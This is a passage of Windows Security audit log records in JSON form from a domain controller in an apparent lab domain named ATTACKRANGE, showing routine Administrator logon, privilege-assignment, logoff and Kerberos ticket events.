as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x6d830","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-8400769","LogonGuid":"{273840F7-1505-59F6-8A53-4282C2415AE5}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 06:55:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220479,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x6D830\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x6d830","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 06:55:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220480,"ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x6D830\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x6d830","LogonType":"3","EventReceivedTime":"2020-08-01 06:55:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220481,"ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-634332812-1885290706-2582043485-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-634332812-1885290706-2582043485-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-634332812-1885290706-2582043485-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 06:55:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220482,"ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{273840F7-1505-59F6-8A53-4282C2415AE5}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-8400769$\r\n\tService ID:\t\tS-1-5-21-634332812-1885290706-2582043485-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-8400769$","ServiceSid":"S-1-5-21-634332812-1885290706-2582043485-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{273840F7-1505-59F6-8A53-4282C2415AE5}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 06:55:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220483,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{273840F7-1505-59F6-8A53-4282C2415AE5}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x538\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{273840F7-1505-59F6-8A53-4282C2415AE5}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 06:55:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220484,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x6D852\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{273840F7-1505-59F6-8A53-4282C2415AE5}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x538\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-8400769\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x6d852","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-8400769","LogonGuid":"{273840F7-1505-59F6-8A53-4282C2415AE5}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 06:55:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220485,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x6D852\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x6d852","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 06:55:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220486,"ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x671B5\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x671b5","LogonType":"3","EventReceivedTime":"2020-08-01 06:55:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220487,"ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x6D852\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x6d852","LogonType":"3","EventReceivedTime":"2020-08-01 06:55:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220488,"ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-634332812-1885290706-2582043485-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-634332812-1885290706-2582043485-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-634332812-1885290706-2582043485-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 06:55:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220489,"ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{273840F7-1505-59F6-8A53-4282C2415AE5}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-8400769$\r\n\tService ID:\t\tS-1-5-21-634332812-1885290706-2582043485-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-8400769$","ServiceSid":"S-1-5-21-634332812-1885290706-2582043485-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{273840F7-1505-59F6-8A53-4282C2415AE5}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 06:55:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220490,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{273840F7-1505-59F6-8A53-4282C2415AE5}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x538\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{273840F7-1505-59F6-8A53-4282C2415AE5}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 06:55:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220491,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x6D893\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{273840F7-1505-59F6-8A53-4282C2415AE5}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x538\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-8400769\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x6d893","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-8400769","LogonGuid":"{273840F7-1505-59F6-8A53-4282C2415AE5}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 06:55:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
